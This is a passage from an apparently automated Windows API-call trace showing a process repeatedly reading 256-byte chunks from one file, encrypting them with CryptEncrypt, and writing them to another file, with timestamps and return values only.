Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.723] GetLastError () returned 0x0 [0171.724] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.724] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.724] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.724] GetLastError () returned 0x0 [0171.724] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.724] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.724] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.724] GetLastError () returned 0x0 [0171.724] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.724] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.724] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.724] GetLastError () returned 0x0 [0171.724] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.724] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.724] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.724] GetLastError () returned 0x0 [0171.724] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.724] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.724] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.724] GetLastError () returned 0x0 [0171.724] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.724] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.724] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.724] GetLastError () returned 0x0 [0171.724] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.724] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.725] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.725] GetLastError () returned 0x0 [0171.725] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.725] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.725] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.725] GetLastError () returned 0x0 [0171.725] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.725] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.725] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.725] GetLastError () returned 0x0 [0171.725] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.725] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.027] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.027] GetLastError () returned 0x0 [0172.027] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.027] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.027] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.027] GetLastError () returned 0x0 [0172.027] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.027] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.027] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.027] GetLastError () returned 0x0 [0172.027] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.027] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.027] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.027] GetLastError () returned 0x0 [0172.028] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.028] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.028] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.028] GetLastError () returned 0x0 [0172.028] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.028] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.028] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.028] GetLastError () returned 0x0 [0172.028] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.028] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.028] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.028] GetLastError () returned 0x0 [0172.028] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.028] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.028] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.028] GetLastError () returned 0x0 [0172.028] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.028] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.028] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.028] GetLastError () returned 0x0 [0172.028] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.028] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.028] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.028] GetLastError () returned 0x0 [0172.028] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.028] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.029] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.029] GetLastError () returned 0x0 [0172.029] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.029] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.029] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.029] GetLastError () returned 0x0 [0172.029] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.029] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.029] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.029] GetLastError () returned 0x0 [0172.029] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.029] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.029] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.029] GetLastError () returned 0x0 [0172.029] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.029] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.029] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.029] GetLastError () returned 0x0 [0172.029] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.029] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.029] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.029] GetLastError () returned 0x0 [0172.029] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.029] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.029] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.029] GetLastError () returned 0x0 [0172.030] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.030] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.030] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.030] GetLastError () returned 0x0 [0172.030] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.030] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.030] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.030] GetLastError () returned 0x0 [0172.030] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.030] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.030] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.030] GetLastError () returned 0x0 [0172.030] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.030] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.030] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.030] GetLastError () returned 0x0 [0172.030] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.030] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.030] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.030] GetLastError () returned 0x0 [0172.030] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, 